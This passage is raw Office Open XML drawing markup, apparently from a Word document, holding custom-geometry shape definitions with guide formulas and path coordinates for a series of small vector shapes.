                                  <a:gd name="T5" fmla="*/ 17 h 39"/>
                                  <a:gd name="T6" fmla="*/ 31 w 31"/>
                                  <a:gd name="T7" fmla="*/ 39 h 39"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="31" h="39">
                                    <a:moveTo>
                                      <a:pt x="31" y="39"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="39"/>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272"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7695" y="2849"/>
                                <a:ext cx="16" cy="13"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 16 w 16"/>
                                  <a:gd name="T1" fmla="*/ 13 h 13"/>
                                  <a:gd name="T2" fmla="*/ 5 w 16"/>
                                  <a:gd name="T3" fmla="*/ 9 h 13"/>
                                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                                  <a:gd name="T5" fmla="*/ 0 h 13"/>
                                  <a:gd name="T6" fmla="*/ 16 w 16"/>
                                  <a:gd name="T7" fmla="*/ 13 h 13"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="16" h="13">
                                    <a:moveTo>
                                      <a:pt x="16" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1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273"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9913" y="2841"/>
                                <a:ext cx="41" cy="134"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 41"/>
                                  <a:gd name="T1" fmla="*/ 8 h 134"/>
                                  <a:gd name="T2" fmla="*/ 41 w 41"/>
                                  <a:gd name="T3" fmla="*/ 125 h 134"/>
                                  <a:gd name="T4" fmla="*/ 36 w 41"/>
                                  <a:gd name="T5" fmla="*/ 130 h 134"/>
                                  <a:gd name="T6" fmla="*/ 31 w 41"/>
                                  <a:gd name="T7" fmla="*/ 134 h 134"/>
                                  <a:gd name="T8" fmla="*/ 15 w 41"/>
                                  <a:gd name="T9" fmla="*/ 130 h 134"/>
                                  <a:gd name="T10" fmla="*/ 10 w 41"/>
                                  <a:gd name="T11" fmla="*/ 130 h 134"/>
                                  <a:gd name="T12" fmla="*/ 0 w 41"/>
                                  <a:gd name="T13" fmla="*/ 125 h 134"/>
                                  <a:gd name="T14" fmla="*/ 0 w 41"/>
                                  <a:gd name="T15" fmla="*/ 65 h 134"/>
                                  <a:gd name="T16" fmla="*/ 0 w 41"/>
                                  <a:gd name="T17" fmla="*/ 4 h 134"/>
                                  <a:gd name="T18" fmla="*/ 10 w 41"/>
                                  <a:gd name="T19" fmla="*/ 0 h 134"/>
                                  <a:gd name="T20" fmla="*/ 20 w 41"/>
                                  <a:gd name="T21" fmla="*/ 0 h 134"/>
                                  <a:gd name="T22" fmla="*/ 31 w 41"/>
                                  <a:gd name="T23" fmla="*/ 4 h 134"/>
                                  <a:gd name="T24" fmla="*/ 31 w 41"/>
                                  <a:gd name="T25"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1" h="134">
                                    <a:moveTo>
                                      <a:pt x="31" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31"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274"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7716" y="2849"/>
                                <a:ext cx="57" cy="134"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                                  <a:gd name="T1" fmla="*/ 5 h 134"/>
                                  <a:gd name="T2" fmla="*/ 52 w 57"/>
                                  <a:gd name="T3" fmla="*/ 22 h 134"/>
                                  <a:gd name="T4" fmla="*/ 46 w 57"/>
                                  <a:gd name="T5" fmla="*/ 39 h 134"/>
                                  <a:gd name="T6" fmla="*/ 52 w 57"/>
                                  <a:gd name="T7" fmla="*/ 74 h 134"/>
                                  <a:gd name="T8" fmla="*/ 52 w 57"/>
                                  <a:gd name="T9" fmla="*/ 109 h 134"/>
                                  <a:gd name="T10" fmla="*/ 46 w 57"/>
                                  <a:gd name="T11" fmla="*/ 122 h 134"/>
                                  <a:gd name="T12" fmla="*/ 31 w 57"/>
                                  <a:gd name="T13" fmla="*/ 134 h 134"/>
                                  <a:gd name="T14" fmla="*/ 20 w 57"/>
                                  <a:gd name="T15" fmla="*/ 134 h 134"/>
                                  <a:gd name="T16" fmla="*/ 15 w 57"/>
                                  <a:gd name="T17" fmla="*/ 130 h 134"/>
                                  <a:gd name="T18" fmla="*/ 5 w 57"/>
                                  <a:gd name="T19" fmla="*/ 117 h 134"/>
                                  <a:gd name="T20" fmla="*/ 5 w 57"/>
                                  <a:gd name="T21" fmla="*/ 96 h 134"/>
                                  <a:gd name="T22" fmla="*/ 5 w 57"/>
                                  <a:gd name="T23" fmla="*/ 78 h 134"/>
                                  <a:gd name="T24" fmla="*/ 0 w 57"/>
                                  <a:gd name="T25" fmla="*/ 61 h 134"/>
                                  <a:gd name="T26" fmla="*/ 5 w 57"/>
                                  <a:gd name="T27" fmla="*/ 70 h 134"/>
                                  <a:gd name="T28" fmla="*/ 10 w 57"/>
                                  <a:gd name="T29" fmla="*/ 70 h 134"/>
                                  <a:gd name="T30" fmla="*/ 20 w 57"/>
                                  <a:gd name="T31" fmla="*/ 70 h 134"/>
                                  <a:gd name="T32" fmla="*/ 20 w 57"/>
                                  <a:gd name="T33" fmla="*/ 57 h 134"/>
                                  <a:gd name="T34" fmla="*/ 15 w 57"/>
                                  <a:gd name="T35" fmla="*/ 44 h 134"/>
                                  <a:gd name="T36" fmla="*/ 0 w 57"/>
                                  <a:gd name="T37" fmla="*/ 22 h 134"/>
                                  <a:gd name="T38" fmla="*/ 15 w 57"/>
                                  <a:gd name="T39" fmla="*/ 39 h 134"/>
                                  <a:gd name="T40" fmla="*/ 20 w 57"/>
                                  <a:gd name="T41" fmla="*/ 52 h 134"/>
                                  <a:gd name="T42" fmla="*/ 31 w 57"/>
                                  <a:gd name="T43" fmla="*/ 57 h 134"/>
                                  <a:gd name="T44" fmla="*/ 31 w 57"/>
                                  <a:gd name="T45" fmla="*/ 52 h 134"/>
                                  <a:gd name="T46" fmla="*/ 31 w 57"/>
                                  <a:gd name="T47" fmla="*/ 44 h 134"/>
                                  <a:gd name="T48" fmla="*/ 31 w 57"/>
                                  <a:gd name="T49" fmla="*/ 31 h 134"/>
                                  <a:gd name="T50" fmla="*/ 36 w 57"/>
                                  <a:gd name="T51" fmla="*/ 35 h 134"/>
                                  <a:gd name="T52" fmla="*/ 41 w 57"/>
                                  <a:gd name="T53" fmla="*/ 31 h 134"/>
                                  <a:gd name="T54" fmla="*/ 41 w 57"/>
                                  <a:gd name="T55" fmla="*/ 13 h 134"/>
                                  <a:gd name="T56" fmla="*/ 41 w 57"/>
                                  <a:gd name="T57" fmla="*/ 9 h 134"/>
                                  <a:gd name="T58" fmla="*/ 41 w 57"/>
                                  <a:gd name="T59" fmla="*/ 0 h 134"/>
                                  <a:gd name="T60" fmla="*/ 52 w 57"/>
                                  <a:gd name="T61" fmla="*/ 0 h 134"/>
                                  <a:gd name="T62" fmla="*/ 57 w 57"/>
                                  <a:gd name="T63" fmla="*/ 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7" h="134">
                                    <a:moveTo>
                                      <a:pt x="57" y="5"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="122"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="96"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="5"/>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275"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7731" y="2849"/>
                                <a:ext cx="11" cy="13"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 11 w 11"/>
                                  <a:gd name="T1" fmla="*/ 13 h 13"/>
                                  <a:gd name="T2" fmla="*/ 0 w 11"/>
                                  <a:gd name="T3" fmla="*/ 0 h 13"/>
                                  <a:gd name="T4" fmla="*/ 11 w 11"/>
                                  <a:gd name="T5" fmla="*/ 13 h 13"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="11" h="13">
                                    <a:moveTo>
                                      <a:pt x="11" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>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276"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7530" y="2854"/>
                                <a:ext cx="10" cy="17"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 10 w 10"/>
                                  <a:gd name="T1" fmla="*/ 17 h 17"/>
                                  <a:gd name="T2" fmla="*/ 5 w 10"/>
                                  <a:gd name="T3" fmla="*/ 13 h 17"/>
                                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                                  <a:gd name="T6" fmla="*/ 10 w 10"/>
                                  <a:gd name="T7" fmla="*/ 17 h 17"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="10" h="17">
                                    <a:moveTo>
                                      <a:pt x="10" y="17"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10"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277"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7561" y="2858"/>
                                <a:ext cx="1" cy="13"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 13 h 13"/>
                                  <a:gd name="T1" fmla="*/ 9 h 13"/>
                                  <a:gd name="T2" fmla="*/ 0 h 13"/>
                                  <a:gd name="T3" fmla="*/ 13 h 13"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T0"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T2"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T3"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path h="13">
                                    <a:moveTo>
                                      <a:pt x="0" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0"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278"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9876" y="2858"/>
                                <a:ext cx="16" cy="91"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 16 w 16"/>
                                  <a:gd name="T1" fmla="*/ 4 h 91"/>
                                  <a:gd name="T2" fmla="*/ 16 w 16"/>
                                  <a:gd name="T3" fmla="*/ 91 h 91"/>
                                  <a:gd name="T4" fmla="*/ 6 w 16"/>
                                  <a:gd name="T5" fmla="*/ 74 h 91"/>
                                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                                  <a:gd name="T7" fmla="*/ 48 h 91"/>
                                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                                  <a:gd name="T9" fmla="*/ 4 h 91"/>
                                  <a:gd name="T10" fmla="*/ 11 w 16"/>
                                  <a:gd name="T11" fmla="*/ 0 h 91"/>
                                  <a:gd name="T12" fmla="*/ 16 w 16"/>
                                  <a:gd name="T13" fmla="*/ 4 h 91"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T12" y="T13"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="16" h="91">
                                    <a:moveTo>
                                      <a:pt x="16" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16"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279"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9969" y="2862"/>
                                <a:ext cx="11" cy="87"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 11 w 11"/>
                                  <a:gd name="T1" fmla="*/ 83 h 87"/>
                                  <a:gd name="T2" fmla="*/ 6 w 11"/>
                                  <a:gd name="T3" fmla="*/ 87 h 87"/>
                                  <a:gd name="T4" fmla="*/ 0 w 11"/>
                                  <a:gd name="T5" fmla="*/ 83 h 87"/>
                                  <a:gd name="T6" fmla="*/ 0 w 11"/>
                                  <a:gd name="T7" fmla="*/ 5 h 87"/>
                                  <a:gd name="T8" fmla="*/ 6 w 11"/>
                                  <a:gd name="T9" fmla="*/ 0 h 87"/>
                                  <a:gd name="T10" fmla="*/ 11 w 11"/>
                                  <a:gd name="T11" fmla="*/ 5 h 87"/>
                                  <a:gd name="T12" fmla="*/ 11 w 11"/>
                                  <a:gd name="T13" fmla="*/ 83 h 87"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T12" y="T13"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="11" h="87">
                                    <a:moveTo>
                                      <a:pt x="11" y="83"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="8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280"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9453" y="2867"/>
                                <a:ext cx="103" cy="82"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 103 w 103"/>
                                  <a:gd name="T1" fmla="*/ 4 h 82"/>
                                  <a:gd name="T2" fmla="*/ 20 w 103"/>
                                  <a:gd name="T3" fmla="*/ 43 h 82"/>
                                  <a:gd name="T4" fmla="*/ 36 w 103"/>
                                  <a:gd name="T5" fmla="*/ 60 h 82"/>
                                  <a:gd name="T6" fmla="*/ 51 w 103"/>
                                  <a:gd name="T7" fmla="*/ 69 h 82"/>
                                  <a:gd name="T8" fmla="*/ 87 w 103"/>
                                  <a:gd name="T9" fmla="*/ 82 h 82"/>
                                  <a:gd name="T10" fmla="*/ 103 w 103"/>
                                  <a:gd name="T11" fmla="*/ 82 h 82"/>
                                  <a:gd name="T12" fmla="*/ 77 w 103"/>
                                  <a:gd name="T13" fmla="*/ 78 h 82"/>
                                  <a:gd name="T14" fmla="*/ 51 w 103"/>
                                  <a:gd name="T15" fmla="*/ 69 h 82"/>
                                  <a:gd name="T16" fmla="*/ 25 w 103"/>
                                  <a:gd name="T17" fmla="*/ 60 h 82"/>
                                  <a:gd name="T18" fmla="*/ 0 w 103"/>
                                  <a:gd name="T19" fmla="*/ 43 h 82"/>
                                  <a:gd name="T20" fmla="*/ 25 w 103"/>
                                  <a:gd name="T21" fmla="*/ 30 h 82"/>
                                  <a:gd name="T22" fmla="*/ 46 w 103"/>
                                  <a:gd name="T23" fmla="*/ 17 h 82"/>
                                  <a:gd name="T24" fmla="*/ 98 w 103"/>
                                  <a:gd name="T25" fmla="*/ 0 h 82"/>
                                  <a:gd name="T26" fmla="*/ 103 w 103"/>
                                  <a:gd name="T27" fmla="*/ 4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82">
                                    <a:moveTo>
                                      <a:pt x="103" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="87" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103"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281"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7612" y="2880"/>
                                <a:ext cx="6" cy="17"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 6 w 6"/>
                                  <a:gd name="T1" fmla="*/ 17 h 17"/>
                                  <a:gd name="T2" fmla="*/ 0 w 6"/>
                                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                                  <a:gd name="T4" fmla="*/ 0 w 6"/>
                                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                                  <a:gd name="T6" fmla="*/ 6 w 6"/>
                                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                                  <a:gd name="T8" fmla="*/ 6 w 6"/>
                                  <a:gd name="T9" fmla="*/ 17 h 17"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="6" h="17">
                                    <a:moveTo>
                                      <a:pt x="6" y="17"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="1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282"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7788" y="2875"/>
                                <a:ext cx="1665" cy="18"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 1639 w 1665"/>
                                  <a:gd name="T1" fmla="*/ 0 h 18"/>
                                  <a:gd name="T2" fmla="*/ 1665 w 1665"/>
                                  <a:gd name="T3" fmla="*/ 9 h 18"/>
                                  <a:gd name="T4" fmla="*/ 1654 w 1665"/>
                                  <a:gd name="T5" fmla="*/ 13 h 18"/>
                                  <a:gd name="T6" fmla="*/ 1618 w 1665"/>
                                  <a:gd name="T7" fmla="*/ 13 h 18"/>
                                  <a:gd name="T8" fmla="*/ 1577 w 1665"/>
                                  <a:gd name="T9" fmla="*/ 13 h 18"/>
                                  <a:gd name="T10" fmla="*/ 1530 w 1665"/>
                                  <a:gd name="T11" fmla="*/ 13 h 18"/>
                                  <a:gd name="T12" fmla="*/ 1479 w 1665"/>
                                  <a:gd name="T13" fmla="*/ 13 h 18"/>
                                  <a:gd name="T14" fmla="*/ 1427 w 1665"/>
                                  <a:gd name="T15" fmla="*/ 13 h 18"/>
                                  <a:gd name="T16" fmla="*/ 1365 w 1665"/>
                                  <a:gd name="T17" fmla="*/ 13 h 18"/>
                                  <a:gd name="T18" fmla="*/ 1241 w 1665"/>
                                  <a:gd name="T19" fmla="*/ 18 h 18"/>
                                  <a:gd name="T20" fmla="*/ 1112 w 1665"/>
                                  <a:gd name="T21" fmla="*/ 18 h 18"/>
                                  <a:gd name="T22" fmla="*/ 972 w 1665"/>
                                  <a:gd name="T23" fmla="*/ 18 h 18"/>
                                  <a:gd name="T24" fmla="*/ 693 w 1665"/>
                                  <a:gd name="T25" fmla="*/ 13 h 18"/>
                                  <a:gd name="T26" fmla="*/ 558 w 1665"/>
                                  <a:gd name="T27" fmla="*/ 13 h 18"/>
                                  <a:gd name="T28" fmla="*/ 429 w 1665"/>
                                  <a:gd name="T29" fmla="*/ 13 h 18"/>
                                  <a:gd name="T30" fmla="*/ 315 w 1665"/>
                                  <a:gd name="T31" fmla="*/ 13 h 18"/>
                                  <a:gd name="T32" fmla="*/ 264 w 1665"/>
                                  <a:gd name="T33" fmla="*/ 13 h 18"/>
                                  <a:gd name="T34" fmla="*/ 217 w 1665"/>
                                  <a:gd name="T35" fmla="*/ 13 h 18"/>
                                  <a:gd name="T36" fmla="*/ 171 w 1665"/>
                                  <a:gd name="T37" fmla="*/ 13 h 18"/>
